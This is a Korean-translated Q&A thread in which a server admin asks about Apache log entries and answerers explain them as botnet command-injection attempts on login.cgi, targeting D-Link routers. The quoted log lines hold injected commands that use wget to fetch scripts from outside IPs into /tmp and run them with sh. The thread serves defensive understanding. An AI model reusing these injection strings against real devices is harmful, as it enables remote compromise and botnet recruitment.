에 새 서버를 구축 중이고 Apache실제로 배우고 있으므로 다양한 것을 시도하고 있습니다. 내 보안 시스템은 이미 완료되었지만 물론 뭔가를 놓칠 수도 있고, 그렇지 않다면 오늘날 어떤 시스템도 나를 100% 보호할 수 없다는 것을 이해합니다. 그렇다면 내 로그에 다음과 같은 내용이 기록되어 있는데 누군가가 나를 시도했다고 생각하는 이유는 무엇입니까?
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
더 많은 것이있었습니다. 나는 이 사람이 오류 400을 받고 있다는 것을 이해하며 그것은 나에게 나쁘지 않습니다. 그래서 사실 내 질문은 그들이 나를 시도하는지 여부가 아닙니다. 왜냐하면 나는 그렇게 생각하기 때문입니다. 왜냐하면 그것은 내 사이트에 대한 일반적인 요청처럼 보이지 않기 때문입니다. 나는 이해하고 배우기 위해 이 요청에 대한 설명을 듣고 싶습니다. 그들이 실제로 무엇을 하려고 했는지, 내 로그인 시스템을 찾아 다른 곳으로 보내려는 걸까요?
추신: 일부 웹사이트를 다운로드할 수 있다는 것을 이미 알고 있으며 , 그 웹사이트도 쿠키 기반 인증 프로그램이라는 wget것을 알았습니다 .login.cgi
감사합니다!
답변1
귀하의 반갑지 않은 방문자는 귀하의 서버에서 일부 스크립트를 다운로드하고 실행하려는 시도를 숨기려고 하지 않습니다.
login.cgi그는 그러한 스크립트가 제자리에 있을 뿐만 아니라 입력을 적절하게 처리하지 않아 아포스트로피 뒤의 모든 항목( %27인코딩된 로그에서) 을 직접 실행하기 를 기대할 수 있습니다 . 아마도 그러한 취약한 스크립트가 없을 것입니다. 그러나 HTTP 코드 400이 항상 영향을 받지 않음을 의미한다는 가정은 근거가 없습니다.
이는 대규모 무작위 대상 그룹을 겨냥한 무인 공격일 가능성이 높습니다. 다운로드하고 실행하려는 스크립트에 무엇이 포함되어 있는지 추측할 수만 있습니다. 스크립트를 전달하는 서버는 일반적으로 지금까지 공격이 성공했다고 가정하는지, 아니면 조사 중인지에 따라 다른 스크립트(+)를 제공하기 때문에 이를 판단할 수 없다고 가정하는 것이 안전합니다.
공격자가 코드 실행 가능성이 낮다고 판단한 것이 아니라 시스템에서 정보를 수집했을 수도 있습니다. 모든 인터넷 연결 장치는 이러한 요청을 정기적으로 예상해야 하며 웹 서버의 모든 스크립트는 이에 대해 걱정할 필요가 없는 방식으로 작성되어야 합니다.
(+)왜공격자가 다른 스크립트를 제공합니까? 손상 후 권한 상승을 조사하기가 더 어려워집니다. 스크립트는 나중에 메모리에서 손실될 가능성이 높으므로 피해자가 나중에 스크립트를 검색할 수 없도록 하는 것이 공격자에게 합리적입니다.어떻게공격자가 다른 스크립트를 제공합니까? 그는 공격 직후에 웹 서버가 공격받은 시스템 IP의 공격 페이로드로만 응답하도록 보장했습니다. 공격은 즉시 성공하거나 실패할 수 있으므로 나중에 스크립트를 검색하는 것은 피해자의 포렌식 팀이나 보안 연구원에게 귀속될 수 있습니다. 이것은 새롭거나 순전히 이론적인 메커니즘이 아닙니다. 저는 2016년에 이미 IP를 기반으로 다른 페이로드를 받았습니다(한 스크립트는 비어 있고 다른 스크립트에는 3단계 페이로드를 로드하는 명령이 포함되어 있음).
답변2
그것은 당신을 개인적으로 공격하는 것이 아닙니다. 대부분의 경우 봇넷은 가능한 모든 IP 주소를 공격하는 데 사용됩니다.
login.cli매개변수를 사용하는 스크립트는 D cli-Link 라우터를 대상으로 하는 것 같습니다. 아마도 변형 일 것입니다.D-Link DSL-2750B - OS 명령 주입:
이 모듈은 D-Link DSL-2750B 장치의 원격 명령 주입 취약점을 악용합니다. "ayecli" 바이너리를 호출하는 데 직접 사용되는 "cli" 매개변수를 통해 취약점을 악용할 수 있습니다. 취약한 펌웨어는 1.01부터 1.03까지입니다.
이러한 모든 요청을 차단하는 데 사용할 수 있는 nginx 또는 Apache와 같은 웹 서버에 대한 차단 목록 모음이 있습니다. 트래픽에 따라 이 작업을 수행하는 것이 유용할 수 있습니다. 특히 트래픽이 많지 않을 것으로 예상되는 소규모 개인 웹사이트의 경우 더욱 그렇습니다.
답변3
나는 이 게시물이 약 1년이 조금 넘었다는 것을 알고 있지만 여기에 명확성을 추가할 수 있습니다.
이는 실제로 봇넷의 일부입니다. 다운로드하려는 스크립트는 다운로드를 시도하고 다운로드한 파일(삭제된 파일)에 실행 가능한 비트/권한을 추가한 다음 실행한 다음 파일을 제거하려고 시도하는 드로퍼입니다.
이 드로퍼의 새 버전에 대해 몇 가지 분석을 했는데, 이는 인코딩되지 않은 쉘 스크립트입니다. 이 네트워크는 2020년이 다가옴에 따라 오늘 다시 활성화되었습니다.
다른 스크립트를 사용하는 문제에 관해서는 개발자가 다른 운영 체제에서 실행하기 위해 별도의 스크립트를 만들 수도 있었습니다. 누군가가 이 봇넷을 다시 패키징하여 재배포하려고 시도하는 것 같습니다. 다음은 바이러스 총계입니다.그래프이는 이 특정 봇넷의 새로운 활동을 보여줍니다.